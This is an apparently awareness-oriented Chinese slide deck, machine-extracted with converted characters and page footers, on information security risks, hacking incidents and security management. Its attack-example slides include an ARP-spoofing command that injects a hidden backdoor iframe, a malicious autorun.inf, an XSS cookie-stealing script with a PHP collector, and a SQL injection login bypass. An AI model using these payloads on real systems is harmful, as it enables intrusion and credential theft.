信息安全風(fēng)險(xiǎn)及分析

信息安全風(fēng)險(xiǎn)及分析第一頁(yè)，共八十八頁(yè)，2022年，8月28日個(gè)人介紹

高顯嵩工作經(jīng)歷：中國(guó)“互聯(lián)網(wǎng)信息安全與政府監(jiān)管”專家組成員中國(guó)法證技術(shù)研究組成員北京司法局電子數(shù)據(jù)鑒定協(xié)會(huì)理事北京廣播電視大學(xué)特聘專家原微軟公司的技術(shù)支持工程師項(xiàng)目背景勞動(dòng)部全國(guó)民辦中介機(jī)構(gòu)信用等級(jí)評(píng)定系統(tǒng)勞動(dòng)部全國(guó)知識(shí)競(jìng)賽評(píng)分系統(tǒng)勞動(dòng)部七個(gè)功能平臺(tái)合并方案北京統(tǒng)計(jì)局的報(bào)表打印系統(tǒng)北京電大一站式平臺(tái)合并的規(guī)劃及實(shí)施為考研在線提供整體安全解決方安及實(shí)施為國(guó)家電力部?jī)?nèi)部網(wǎng)絡(luò)設(shè)計(jì)安全解決方安及實(shí)施鞍山移動(dòng)公司網(wǎng)絡(luò)規(guī)劃長(zhǎng)期負(fù)責(zé)北京市安全局國(guó)家安全部?jī)?nèi)部技術(shù)培訓(xùn)負(fù)責(zé)華彬大廈的整個(gè)網(wǎng)絡(luò)規(guī)劃及實(shí)施美國(guó)百麥公司北京分公司的整個(gè)網(wǎng)絡(luò)規(guī)劃及實(shí)施第二頁(yè)，共八十八頁(yè)，2022年，8月28日主要內(nèi)容信息安全的重要性信息安全問題分析信息安全管理概述信息安全風(fēng)險(xiǎn)管理信息安全人員管理第三頁(yè)，共八十八頁(yè)，2022年，8月28日信息安全重要性第四頁(yè)，共八十八頁(yè)，2022年，8月28日當(dāng)前我國(guó)網(wǎng)絡(luò)信息安全的狀況網(wǎng)絡(luò)及計(jì)算機(jī)病毒傳播泛濫垃圾郵件和病毒郵件泛濫黑客攻擊事件頻繁用戶的個(gè)人隱私及計(jì)算機(jī)的使用權(quán)受到侵犯網(wǎng)絡(luò)犯罪事件頻繁監(jiān)管力度不夠涉及版權(quán)問題的事件增多沒有統(tǒng)一完善的適合國(guó)情的安全標(biāo)準(zhǔn)及法規(guī)沒有職責(zé)分明的管理部門或管理小組制約與網(wǎng)絡(luò)基礎(chǔ)設(shè)施和技術(shù)環(huán)境安全體系不健全全民安全意識(shí)及計(jì)算機(jī)網(wǎng)絡(luò)知識(shí)薄弱第五頁(yè)，共八十八頁(yè)，2022年，8月28日CERT有關(guān)信息安全的統(tǒng)計(jì)第六頁(yè)，共八十八頁(yè)，2022年，8月28日CERT有關(guān)信息安全的統(tǒng)計(jì)第七頁(yè)，共八十八頁(yè)，2022年，8月28日CERT有關(guān)信息安全的統(tǒng)計(jì)

第八頁(yè)，共八十八頁(yè)，2022年，8月28日網(wǎng)絡(luò)病毒傳播泛濫據(jù)2001年調(diào)查，我國(guó)約73%的計(jì)算機(jī)用戶曾感染病毒，2003年上半年升至83%。其中，感染3次以上的用戶高達(dá)59%，而且病毒的破壞性較大，被病毒破壞全部數(shù)據(jù)的占14%，破壞部分?jǐn)?shù)據(jù)的占57%。對(duì)病毒的預(yù)防和發(fā)現(xiàn)速度相對(duì)緩慢垃圾郵件及病毒郵件泛濫第九頁(yè)，共八十八頁(yè)，2022年，8月28日黑客離我們很近1996年信息安全數(shù)據(jù)顯示，世界上平均每２０秒就有一起黑客事件發(fā)生，無論是政府機(jī)構(gòu)、軍事部門，還是各大銀行、大公司，只要與互聯(lián)網(wǎng)接軌，就難逃黑客的“黑手”。據(jù)美國(guó)網(wǎng)絡(luò)安全公司Sophos發(fā)布的報(bào)告顯示，在2008年第一季度，平均每5秒鐘就會(huì)有一個(gè)網(wǎng)頁(yè)成為黑客們的“盤中餐”。中國(guó)網(wǎng)民每年被網(wǎng)絡(luò)黑客“黑”掉76億元。第十頁(yè)，共八十八頁(yè)，2022年，8月28日FBI計(jì)算機(jī)犯罪調(diào)查報(bào)告2002年503家機(jī)構(gòu)中，有60%受到了攻擊2002年其中223家（占503家的44%）損失的總和達(dá)到$4.55848億2003年530家機(jī)構(gòu)中有75%（398家）在年內(nèi)受到了攻擊2003年251家（占530家的47%）的經(jīng)濟(jì)損失總和為$2.01799734億第十一頁(yè)，共八十八頁(yè)，2022年，8月28日全球信息安全損失數(shù)額：

年份損失額199936億美元200042億美元2001129億美元

2002超過200億美元2003超過280億美元第十二頁(yè)，共八十八頁(yè)，2022年，8月28日中國(guó)已成為全球黑客的第三大來源地

有關(guān)統(tǒng)計(jì)數(shù)據(jù)顯示，目前我國(guó)95%的與因特網(wǎng)相聯(lián)的網(wǎng)絡(luò)管理中心都遭到過國(guó)境內(nèi)外黑客的攻擊或侵入，受害涉及的覆蓋面越來越大、程度越來越深。據(jù)國(guó)際互聯(lián)網(wǎng)保安公司Symantec年的報(bào)告指出，中國(guó)甚至已經(jīng)成為全球黑客的第三大來源地，竟然有6.9%的攻擊國(guó)際互聯(lián)網(wǎng)活動(dòng)都是由中國(guó)發(fā)出的。然而面對(duì)這種局面，我國(guó)卻缺乏像西方發(fā)達(dá)國(guó)家那樣健全的防范措施。第十三頁(yè)，共八十八頁(yè)，2022年，8月28日第十四頁(yè)，共八十八頁(yè)，2022年，8月28日第十五頁(yè)，共八十八頁(yè)，2022年，8月28日第十六頁(yè)，共八十八頁(yè)，2022年，8月28日2003年黑客事件中韓新人王網(wǎng)上對(duì)抗遭黑客入侵推遲10多分鐘中韓圍棋新人王對(duì)抗賽在中國(guó)的新浪網(wǎng)和韓國(guó)ｃｙｂｅｒ網(wǎng)站落子，孔杰七段執(zhí)白中盤戰(zhàn)勝韓國(guó)的宋泰坤四段。賽前，由于有人以孔杰的名字入侵比賽的服務(wù)器，導(dǎo)致比賽推遲了１０多分鐘才正常進(jìn)行。第十七頁(yè)，共八十八頁(yè)，2022年，8月28日2003年黑客事件百度連續(xù)遭遇嚴(yán)重黑客攻擊5月15日至5月18日，中文搜索網(wǎng)站百度遭到中國(guó)互聯(lián)網(wǎng)有史以來罕見黑客攻擊。據(jù)百度負(fù)責(zé)技術(shù)的副總裁劉建國(guó)介紹，自5月15日22:00起，百度的檢索量突然大增，此番增長(zhǎng)并未引起工程師注意。5月16日，攻擊更加強(qiáng)烈，每秒鐘攻擊次數(shù)搞到達(dá)1000次，同一個(gè)詞被查詢次數(shù)最多達(dá)38863次。據(jù)互聯(lián)網(wǎng)技術(shù)專家介紹，每秒鐘攻擊100次就已經(jīng)屬于非常嚴(yán)重的攻擊，而每秒鐘1000次的攻擊就實(shí)屬罕見第十八頁(yè)，共八十八頁(yè)，2022年，8月28日2003年黑客事件263游戲論壇遭黑客攻擊關(guān)閉第十九頁(yè)，共八十八頁(yè)，2022年，8月28日2004年黑客事件騰訊服務(wù)器被攻擊

10月17日早上10時(shí)許，國(guó)內(nèi)各地網(wǎng)民陸續(xù)騰訊QQ無法登陸。據(jù)騰訊QQ內(nèi)部技術(shù)人員透露，一國(guó)內(nèi)團(tuán)體，利用騰訊QQ服務(wù)器漏洞要挾騰訊支付100萬美金作為“修復(fù)”費(fèi)用，騰訊QQ不予理睬后，該組織于17日正式發(fā)動(dòng)攻擊，騰訊QQ服務(wù)器在1個(gè)小時(shí)內(nèi)大面積出現(xiàn)故障,不得不全面終止進(jìn)行搶修.本次行動(dòng)組織嚴(yán)謹(jǐn)、操作迅速，業(yè)內(nèi)有部分安全管理人士稱網(wǎng)絡(luò)進(jìn)入軟件綁架勒索時(shí)代。第二十頁(yè)，共八十八頁(yè)，2022年，8月28日2004年黑客事件江民網(wǎng)站被攻擊

2004年10月17日國(guó)內(nèi)著名的殺毒軟件廠商江民公司的網(wǎng)站被一名為河馬史詩(shī)的黑客攻破，頁(yè)面內(nèi)容被篡改。攻擊緣由：江民公司的最新殺毒軟件產(chǎn)品KV2005的升級(jí)導(dǎo)致用戶在上網(wǎng)時(shí)無法打開“郵件監(jiān)控和網(wǎng)頁(yè)監(jiān)控”，用戶在江民公司的官方論壇發(fā)反映后，江民沒有做出及時(shí)的回復(fù)，也沒能在短時(shí)間內(nèi)解決用戶的問題。第二十一頁(yè)，共八十八頁(yè)，2022年，8月28日2005年黑客事件頻繁

也許你的計(jì)算機(jī)正在被當(dāng)作從事違法犯罪活動(dòng)的工具，而當(dāng)這些悄悄發(fā)生的時(shí)候，你卻一無所知，因?yàn)槟愕碾娔X已經(jīng)成為被別人控制的“僵尸電腦”。第二十二頁(yè)，共八十八頁(yè)，2022年，8月28日2005年黑客事件國(guó)內(nèi)首起僵尸網(wǎng)絡(luò)事件今年27歲的徐立系唐山市某企業(yè)工人，其利用某些手段在互聯(lián)網(wǎng)上傳播其編寫的特定程序，先后植入4萬余臺(tái)計(jì)算機(jī)，形成了中國(guó)首例BOTNET“僵尸網(wǎng)絡(luò)。

2004年10月至2005年1月，徐立操縱“僵尸網(wǎng)絡(luò)”對(duì)北京大呂黃鐘電子商務(wù)有限公司所屬音樂網(wǎng)站北京飛行網(wǎng)（簡(jiǎn)稱酷樂），發(fā)動(dòng)多次攻擊，致使該公司蒙受重大經(jīng)濟(jì)損失，并導(dǎo)致北京電信數(shù)據(jù)中心某機(jī)房網(wǎng)絡(luò)設(shè)備大面積癱瘓。第二十三頁(yè)，共八十八頁(yè)，2022年，8月28日2006年黑客事件2006年12月31日中國(guó)工商銀行被黑06年的最后一天，很多網(wǎng)友都收到一些號(hào)稱“工行要倒閉，所有存款均沒收”之類的新聞鏈接，地址都是正牌的，而不是盜版的。原來工商被黑客入侵，截止當(dāng)天晚上11點(diǎn)，發(fā)現(xiàn)此漏洞已經(jīng)修改好。第二十四頁(yè)，共八十八頁(yè)，2022年，8月28日07年第一黑客事件深圳律師網(wǎng)被黑當(dāng)進(jìn)入該網(wǎng)站之后，就發(fā)生事故了，發(fā)現(xiàn)，已經(jīng)被黑.主要有以下字樣：天空未留痕跡,鳥兒卻已飛過.網(wǎng)絡(luò)亦是虛擬,瘋狂亦是叛逆.

.......~~~尊敬的網(wǎng)站管理員您好~~~.....................臺(tái)灣是中國(guó)的，日本是吃S的...........................如果你是中國(guó)人......................請(qǐng)保留此頁(yè)幾天謝謝!.........

少年★浪子所向披靡OICQ11888956第二十五頁(yè)，共八十八頁(yè)，2022年，8月28日例子：得到本地登錄密碼Pulist.exe+findpass.exePasswordReminder.exe第二十六頁(yè)，共八十八頁(yè)，2022年，8月28日例子：記錄本地登錄密碼GINAPassWordSniffer第二十七頁(yè)，共八十八頁(yè)，2022年，8月28日例子得到遠(yuǎn)程計(jì)算機(jī)的密碼IpcScan2.0第二十八頁(yè)，共八十八頁(yè)，2022年，8月28日例子：更改本地管理員密碼WindowsNT/2000/XP/2003/Linux/Unix系統(tǒng)，本地接觸可以更改任意用戶的密碼。一張軟盤更改本地管理員密碼Ntpassword一張光盤更改本地管理員密碼ERDCommander2003第二十九頁(yè)，共八十八頁(yè)，2022年，8月28日例子：ERDCOMMANDER第三十頁(yè)，共八十八頁(yè)，2022年，8月28日例子：ERDCOMMANDER第三十一頁(yè)，共八十八頁(yè)，2022年，8月28日例子：得到他人的郵件密碼密碼監(jiān)聽器2.8第三十二頁(yè)，共八十八頁(yè)，2022年，8月28日第三十三頁(yè)，共八十八頁(yè)，2022年，8月28日第三十四頁(yè)，共八十八頁(yè)，2022年，8月28日第三十五頁(yè)，共八十八頁(yè)，2022年，8月28日例子：內(nèi)網(wǎng)滲透ZXARPS.EXE內(nèi)網(wǎng)主機(jī)訪問任意站點(diǎn)被入侵指定的IP段中的用戶訪問的所有網(wǎng)站都插入一個(gè)框架代碼

zxarps.exe-idx0-ip-9-port80-insert"<iframesrc=‘/backdoor.htm'width=0height=0>"第三十六頁(yè)，共八十八頁(yè)，2022年，8月28日ARP協(xié)議工作原理第三十七頁(yè)，共八十八頁(yè)，2022年，8月28日ARP欺騙交換機(jī)第三十八頁(yè)，共八十八頁(yè)，2022年，8月28日ARP欺騙計(jì)算機(jī)第三十九頁(yè)，共八十八頁(yè)，2022年，8月28日例子：內(nèi)網(wǎng)U盤感染U盤在互聯(lián)網(wǎng)和局域網(wǎng)內(nèi)交叉使用文件被盜取Autorun.infautorun風(fēng)暴[autorun]open=shell\open=打開(&O)shell\open\Command=WScript.exe.\autorun.vbsshell\open\Default=1shell\explore=資源管理器(&X)shell\explore\Command=WScript.exe.\autorun.vbs第四十頁(yè)，共八十八頁(yè)，2022年，8月28日例子：查看網(wǎng)絡(luò)內(nèi)任何人的上網(wǎng)記錄可以記錄同一局域網(wǎng)內(nèi)任何計(jì)算機(jī)上瀏覽的網(wǎng)頁(yè)內(nèi)容，察看的郵箱內(nèi)容，登陸的ftp的內(nèi)容。用Outlook或者OutlookExpress接受的全部郵件都回同時(shí)被該軟件接收。第四十一頁(yè)，共八十八頁(yè)，2022年，8月28日第四十二頁(yè)，共八十八頁(yè)，2022年，8月28日例子：查看MSN密碼第四十三頁(yè)，共八十八頁(yè)，2022年，8月28日例子：察看星號(hào)密碼第四十四頁(yè)，共八十八頁(yè)，2022年，8月28日例子：讀取緩存密碼第四十五頁(yè)，共八十八頁(yè)，2022年，8月28日例子：控制他人計(jì)算機(jī)Dameware4.5RemoteAdministrator2.1是一種網(wǎng)絡(luò)管理軟件，但是經(jīng)常被黑客利用來遠(yuǎn)程控制和管理，被入侵者的計(jì)算機(jī)。第四十六頁(yè)，共八十八頁(yè)，2022年，8月28日第四十七頁(yè)，共八十八頁(yè)，2022年，8月28日第四十八頁(yè)，共八十八頁(yè)，2022年，8月28日例子：打開對(duì)方攝像頭和語音第四十九頁(yè)，共八十八頁(yè)，2022年，8月28日SQLINJECTION針對(duì)網(wǎng)站的攻擊第五十頁(yè)，共八十八頁(yè)，2022年，8月28日SQLINJECTION針對(duì)網(wǎng)站的攻擊第五十一頁(yè)，共八十八頁(yè)，2022年，8月28日SQLINJECTION針對(duì)網(wǎng)站的攻擊第五十二頁(yè)，共八十八頁(yè)，2022年，8月28日SQLINJECTION針對(duì)網(wǎng)站的攻擊第五十三頁(yè)，共八十八頁(yè)，2022年，8月28日SQLINJECTION針對(duì)網(wǎng)站的攻擊第五十四頁(yè)，共八十八頁(yè)，2022年，8月28日SQLINJECTION針對(duì)網(wǎng)站的攻擊第五十五頁(yè)，共八十八頁(yè)，2022年，8月28日SQLINJECTION針對(duì)網(wǎng)站的攻擊第五十六頁(yè)，共八十八頁(yè)，2022年，8月28日SQLINJECTION針對(duì)網(wǎng)站的攻擊第五十七頁(yè)，共八十八頁(yè)，2022年，8月28日SQLINJECTION針對(duì)網(wǎng)站的攻擊第五十八頁(yè)，共八十八頁(yè)，2022年，8月28日XSS跨站腳本構(gòu)建了個(gè)Javascript腳本傳遞客戶端的cookie到黑客的服務(wù)器Javascript腳本可以簡(jiǎn)單的這樣寫

varimg=newImage();

img.src=‘get_cookie.php?var=’+encodeURI(document.cookie);

然后服務(wù)器端使用PHP簡(jiǎn)單寫了個(gè)腳本保存Cookie數(shù)據(jù)

<?php

if(isset($_GET[‘var’])){

file_put_contents(‘./cookie/’.time().‘.txt’,urldecode($_GET[‘var’]));

}?>

第五十九頁(yè)，共八十八頁(yè)，2022年，8月28日構(gòu)造SQL登陸語句用戶名:

admin密碼:

1’or‘1’=‘1第六十頁(yè)，共八十八頁(yè)，2022年，8月28日其他例子擊鍵記錄Office文檔掛栽木馬網(wǎng)頁(yè)木馬木馬捆綁第六十一頁(yè)，共八十八頁(yè)，2022年，8月28日信息安全管理概述第六十二頁(yè)，共八十八頁(yè)，2022年，8月28日例一：局域網(wǎng)內(nèi)病毒泛濫成災(zāi)。例二：網(wǎng)絡(luò)中為什么會(huì)有ARP欺騙的問題發(fā)生

例三：局域網(wǎng)內(nèi)計(jì)算機(jī)故障頻繁發(fā)生例四：為什么要給每個(gè)用戶管理員權(quán)限先來分析兩個(gè)例子第六十三頁(yè)，共八十八頁(yè)，2022年，8月28日信息安全的成敗取決于兩個(gè)因素：技術(shù)和管理。技術(shù)是信息安全的構(gòu)筑材料，管理是真正的粘合劑和催化劑。人們常說，三分技術(shù)，七分管理，可見管理對(duì)信息安全的重要性。信息安全管理（InformationSecurityManagement）作為組織完整的管理體系中一個(gè)重要的環(huán)節(jié)，它構(gòu)成了信息安全具有能動(dòng)性的部分，是指導(dǎo)和控制組織的關(guān)于信息安全風(fēng)險(xiǎn)的相互協(xié)調(diào)的活動(dòng)，其針對(duì)對(duì)象就是組織的信息資產(chǎn)?，F(xiàn)實(shí)世界里大多數(shù)安全事件的發(fā)生和安全隱患的存在，與其說是技術(shù)上的原因，不如說是管理不善造成的，理解并重視管理對(duì)于信息安全的關(guān)鍵作用，對(duì)于真正實(shí)現(xiàn)信息安全目標(biāo)來說尤其重要。什么是信息安全管理？第六十四頁(yè)，共八十八頁(yè)，2022年，8月28日

根據(jù)風(fēng)險(xiǎn)評(píng)估結(jié)果、法律法規(guī)要求、組織業(yè)務(wù)運(yùn)作自身需要來確定控制目標(biāo)與控制措施。

實(shí)施所選的安全控制措施。

針對(duì)檢查結(jié)果采取應(yīng)對(duì)措施，改進(jìn)安全狀況。

依據(jù)策略、程序、標(biāo)準(zhǔn)和法律法規(guī)，對(duì)安全措施的實(shí)施情況進(jìn)行符合性檢查。信息安全管理模型第六十五頁(yè)，共八十八頁(yè)，2022年，8月28日信息安全必須從整體考慮，必須做到“有計(jì)劃有目標(biāo)、發(fā)現(xiàn)問題、分析問題、采取措施解決問題、后續(xù)監(jiān)督避免再現(xiàn)”這樣全程管理的思路，這就要求建立的是一套完整的信息安全管理體系，這樣的系統(tǒng)工程，只有處于組織最高管理者領(lǐng)導(dǎo)和支持之下，才可能成功最高管理層通過明確信息安全目標(biāo)和方針為信息安全活動(dòng)指引方向最高管理層能夠?yàn)樾畔踩顒?dòng)提供必要的資源支持最高管理層能夠在重大問題上做出決策最高管理層可以協(xié)調(diào)組織不同單位不同環(huán)節(jié)的關(guān)系，提升促動(dòng)力說到底，最高管理者是組織信息安全的最終責(zé)任人組織高管全面負(fù)責(zé)信息安全管理第六十六頁(yè)，共八十八頁(yè)，2022年，8月28日制定有效的安全管理計(jì)劃，可以確保信息安全策略得到恰當(dāng)執(zhí)行進(jìn)行有效安全管理的途徑，應(yīng)該是自上而下的（Top-Down）：最高管理層負(fù)責(zé)啟動(dòng)并定義組織的安全方針管理中層負(fù)責(zé)將安全策略充實(shí)成標(biāo)準(zhǔn)、基線、指南和程序，并監(jiān)督執(zhí)行業(yè)務(wù)經(jīng)理或安全專家負(fù)責(zé)實(shí)施安全管理文件中的指定配置最終用戶負(fù)責(zé)遵守組織所有的安全策略安全管理計(jì)劃小組應(yīng)該開發(fā)三類計(jì)劃：戰(zhàn)略計(jì)劃（strategicplan）是長(zhǎng)期計(jì)劃（例如5年），相對(duì)穩(wěn)定，定義了組織的目標(biāo)和使命

戰(zhàn)術(shù)計(jì)劃（tacticalplan）是中期計(jì)劃（例如1年），是對(duì)實(shí)現(xiàn)戰(zhàn)略計(jì)劃中既定目標(biāo)的任務(wù)和進(jìn)度的細(xì)節(jié)描述，例如雇用計(jì)劃、預(yù)算計(jì)劃、維護(hù)計(jì)劃、系統(tǒng)開發(fā)計(jì)劃等

操作計(jì)劃（operationalplan）是短期的高度細(xì)化的計(jì)劃，須經(jīng)常更新（每月或每季度），例如培訓(xùn)計(jì)劃、系統(tǒng)部署計(jì)劃、產(chǎn)品設(shè)計(jì)計(jì)劃等按計(jì)劃行事第六十七頁(yè)，共八十八頁(yè)，2022年，8月28日數(shù)據(jù)收集者（DataCollector）對(duì)數(shù)據(jù)主體（DataSubject）：準(zhǔn)確（Accuracy）、隱私（Privacy）；數(shù)據(jù)保管者（DataCustodian）對(duì)數(shù)據(jù)擁有者（DataOwner）：可用性（Availability）、完整性（Integrity）、保密性（Confidentiality）；數(shù)據(jù)用戶（DataUsers）對(duì)擁有者/主體（Owner/Subject）：保密性（Confidentiality）和完整性；系統(tǒng)用戶（SystemUsers）對(duì)系統(tǒng)擁有者（SystemOwner）：可用性（Availability）和軟件完整性（SoftwareIntegrity）；系統(tǒng)管理者（SystemManager）對(duì)用戶（Users），可用性（Integrity）、完整性（Integrity）；用戶（Users）對(duì)其它用戶（OtherUsers）：可用性（Availability）。重要角色和職責(zé)第六十八頁(yè)，共八十八頁(yè)，2022年，8月28日信息安全管風(fēng)險(xiǎn)管理第六十九頁(yè)，共八十八頁(yè)，2022年，8月28日風(fēng)險(xiǎn)

風(fēng)險(xiǎn)管理（RiskManagement）就是識(shí)別風(fēng)險(xiǎn)、評(píng)估風(fēng)險(xiǎn)、采取措施將風(fēng)險(xiǎn)減少到可接受水平，并維持這個(gè)風(fēng)險(xiǎn)水平的過程。風(fēng)險(xiǎn)管理是信息安全管理的核心內(nèi)容。在信息安全領(lǐng)域，風(fēng)險(xiǎn)（Risk）就是指信息資產(chǎn)遭受損壞并給企業(yè)帶來負(fù)面影響的潛在可能性。風(fēng)險(xiǎn)管理風(fēng)險(xiǎn)管理概述第七十頁(yè)，共八十八頁(yè)，2022年，8月28日資產(chǎn)（Asset）——對(duì)組織具有價(jià)值的信息資產(chǎn)，包括計(jì)算機(jī)硬件、通信設(shè)施、數(shù)據(jù)庫(kù)、文檔信息、軟件、信息服務(wù)和人員等，所有這些資產(chǎn)都需要妥善保護(hù)。威脅（Threat）——可能對(duì)資產(chǎn)或組織造成損害的某種安全事件發(fā)生的潛在原因，需要識(shí)別出威脅源（Threatsource）或威脅代理（Threatagent）。弱點(diǎn)（Vulnerability）——也被稱作漏洞或脆弱性，即資產(chǎn)或資產(chǎn)組中存在的可被威脅利用的缺點(diǎn)，弱點(diǎn)一旦被利用，就可能對(duì)資產(chǎn)造成損害。風(fēng)險(xiǎn)（Risk）——特定威脅利用資產(chǎn)弱點(diǎn)給資產(chǎn)或資產(chǎn)組帶來?yè)p害的潛在可能性?？赡苄裕↙ikelihood）——對(duì)威脅發(fā)生幾率（Probability）或頻率（Frequency）的定性描述。影響（Impact）——后果（Consequence），意外事件發(fā)生給組織帶來的直接或間接的損失或傷害。安全措施（Safeguard）——控制（control）或?qū)Σ撸╟ountermeasure），即通過防范威脅、減少弱點(diǎn)、限制意外事件帶來影響等途徑來消減風(fēng)險(xiǎn)的機(jī)制、方法和措施。殘留風(fēng)險(xiǎn)（ResidualRisk）——在實(shí)施安全措施之后仍然存在的風(fēng)險(xiǎn)。風(fēng)險(xiǎn)管理相關(guān)要素第七十一頁(yè)，共八十八頁(yè)，2022年，8月28日風(fēng)險(xiǎn)RISKRISKRISKRISK風(fēng)險(xiǎn)基本的風(fēng)險(xiǎn)采取措施后剩余的風(fēng)險(xiǎn)資產(chǎn)威脅弱點(diǎn)資產(chǎn)威脅弱點(diǎn)風(fēng)險(xiǎn)管理的目標(biāo)第七十二頁(yè)，共八十八頁(yè)，2022年，8月28日安全控制的成本安全事件造成的損失最小化的總成本低高高安全成本/損失所提供的安全水平關(guān)鍵是達(dá)成成本利益的平衡第七十三頁(yè)，共八十八頁(yè)，2022年，8月28日識(shí)別并評(píng)價(jià)資產(chǎn)識(shí)別并評(píng)估威脅識(shí)別并評(píng)估弱點(diǎn)現(xiàn)有控制確認(rèn)風(fēng)險(xiǎn)評(píng)價(jià)接受保持現(xiàn)有控制確定風(fēng)險(xiǎn)消減策略選擇控制目標(biāo)和控制方式實(shí)施選定的控制YesNo確認(rèn)并評(píng)估殘留風(fēng)險(xiǎn)定期評(píng)估風(fēng)險(xiǎn)評(píng)估風(fēng)險(xiǎn)消減風(fēng)險(xiǎn)接受及控制風(fēng)險(xiǎn)管理風(fēng)險(xiǎn)管理的一般過程第七十四頁(yè)，共八十八頁(yè)，2022年，8月28日風(fēng)險(xiǎn)評(píng)估（RiskAssessment）是對(duì)信息資產(chǎn)及其價(jià)值、面臨的威脅、存在的弱點(diǎn)，以及三者綜合作用而帶來風(fēng)險(xiǎn)的大小或水平的評(píng)估。作為風(fēng)險(xiǎn)管理的基礎(chǔ)，風(fēng)險(xiǎn)評(píng)估是組織確定信息安全需求的一個(gè)重要途徑，屬于組織信息安全管理體系策劃的過程。主要任務(wù)包括：識(shí)別構(gòu)成風(fēng)險(xiǎn)的各種因素評(píng)估風(fēng)險(xiǎn)發(fā)生的可能性和造成的影響，并最終評(píng)價(jià)風(fēng)險(xiǎn)水平或大小確定組織承受風(fēng)險(xiǎn)的能力確定風(fēng)險(xiǎn)消減和控制的策略、目標(biāo)和優(yōu)先順序推薦風(fēng)險(xiǎn)消減對(duì)策以供實(shí)施包括風(fēng)險(xiǎn)分析（RiskAnalysis）和風(fēng)險(xiǎn)評(píng)價(jià)（RiskEvaluation）兩部分，但一般來說，風(fēng)險(xiǎn)評(píng)估和風(fēng)險(xiǎn)分析同義。什么是風(fēng)險(xiǎn)評(píng)估？第七十五頁(yè)，共八十八頁(yè)，2022年，8月28日降低風(fēng)險(xiǎn)（ReduceRisk）——實(shí)施有效控制，將風(fēng)險(xiǎn)降低到可接受的程度，實(shí)際上就是力圖減小威脅發(fā)生的可能性和帶來的影響，包括：減少威脅：例如，實(shí)施惡意軟件控制程序，減少信息系統(tǒng)受惡意軟件攻擊的機(jī)會(huì)減少弱點(diǎn)：例如，通過安全意識(shí)培訓(xùn)，強(qiáng)化職員的安全意識(shí)與安全操作能力降低影響：例如，制定災(zāi)難恢復(fù)計(jì)劃和業(yè)務(wù)連續(xù)性計(jì)劃，做好備份規(guī)避風(fēng)險(xiǎn)（AvoidRisk）——或者RejectingRisk。有時(shí)候，組織可以選擇放棄某些可能引來風(fēng)險(xiǎn)的業(yè)務(wù)或資產(chǎn)，以此規(guī)避風(fēng)險(xiǎn)。例如，將重要的計(jì)算機(jī)系統(tǒng)與互聯(lián)網(wǎng)隔離，使其免遭來自外部網(wǎng)絡(luò)的攻擊。轉(zhuǎn)嫁風(fēng)險(xiǎn)（TransferRisk）——也稱作RiskAssignment。將風(fēng)險(xiǎn)全部或者部分地轉(zhuǎn)移到其他責(zé)任方，例如購(gòu)買商業(yè)保險(xiǎn)。接受風(fēng)險(xiǎn)（AcceptRisk）——在實(shí)施了其他風(fēng)險(xiǎn)應(yīng)對(duì)措施之后，對(duì)于殘留的風(fēng)險(xiǎn)，組織可以選擇接受。確定風(fēng)險(xiǎn)消減策略第七十六頁(yè)，共八十八頁(yè)，2022年，8月28日絕對(duì)安全（即零風(fēng)險(xiǎn)）是不可能的。實(shí)施安全控制后會(huì)有殘留風(fēng)險(xiǎn)或殘存風(fēng)險(xiǎn)（ResidualRisk）。為了實(shí)現(xiàn)信息安全，應(yīng)該確保殘留風(fēng)險(xiǎn)在可接受的范圍內(nèi)：殘留風(fēng)險(xiǎn)Rr＝原有風(fēng)險(xiǎn)R0－控制效力ΔR

殘留風(fēng)險(xiǎn)Rr≤可接受的風(fēng)險(xiǎn)Rt

對(duì)殘留風(fēng)險(xiǎn)進(jìn)行確認(rèn)和評(píng)價(jià)的過程其實(shí)就是風(fēng)險(xiǎn)接受的過程。決策者可以根據(jù)風(fēng)險(xiǎn)評(píng)估的結(jié)果來確定一個(gè)閥值，以該閥值作為是否接受殘留風(fēng)險(xiǎn)的標(biāo)準(zhǔn)。評(píng)價(jià)殘留風(fēng)險(xiǎn)第七十七頁(yè)，共八十八頁(yè)，2022年，8月28日信息安全人員管理第七十八頁(yè)，共八十八頁(yè)，2022年，8月28日人是信息安全的關(guān)鍵因素，人員管理不善會(huì)給組織帶來非常大的安全威脅和風(fēng)險(xiǎn)。有調(diào)查顯示，大多數(shù)重大信息安全事件通常都來自組織內(nèi)部，例如，員工受利益驅(qū)使將公司技術(shù)圖紙出賣給競(jìng)爭(zhēng)對(duì)手，利用內(nèi)部系統(tǒng)從事經(jīng)濟(jì)犯罪活動(dòng)，或者由于缺乏安全意識(shí)或操作技能而導(dǎo)致誤操作，引起信息系統(tǒng)故障等。為降低內(nèi)部員工所帶來的人為差錯(cuò)、盜竊、欺詐及濫用設(shè)施的風(fēng)險(xiǎn)，并且避免引發(fā)法律風(fēng)險(xiǎn)，組織應(yīng)該采取措施，加強(qiáng)內(nèi)部人員的安全管理：對(duì)工作申請(qǐng)者實(shí)施背景檢查簽署雇用合同和保密協(xié)議加強(qiáng)在職人員的安全管理嚴(yán)格控制人員離職程序必須高度重視人員安全問題第七十九頁(yè)，共八十八頁(yè)，2022年，8月28日背景檢查是工作申請(qǐng)過程的一個(gè)部分，組織至少會(huì)審查申請(qǐng)人簡(jiǎn)歷中的基本信息。對(duì)于敏感職位，可能還會(huì)考慮進(jìn)一步的調(diào)查。調(diào)查過程中，組織可以請(qǐng)求訪問申請(qǐng)人的信用和犯罪記錄，甚至可以聘請(qǐng)外部公司對(duì)申請(qǐng)人進(jìn)行調(diào)查，以確定是否存在潛在問題或利益沖突。通過背景檢查，可以防止：因?yàn)槿藛T解雇而導(dǎo)致法律訴訟因?yàn)楣陀檬韬龆鴮?dǎo)致第三方的法律訴訟雇用不合格的人員喪失商業(yè)秘密員工從一般崗位轉(zhuǎn)入信息安全重要崗位，組織也應(yīng)當(dāng)對(duì)其進(jìn)行檢查，對(duì)于處在有相當(dāng)權(quán)力位置的人員，這種檢查應(yīng)定期進(jìn)行。背景檢查（BACKGROUNDCHECK）第八十頁(yè)，共八十八頁(yè)，2022年，8月28日組織應(yīng)與所有員工簽訂保密協(xié)議，作為雇用合同基本條款的一部分

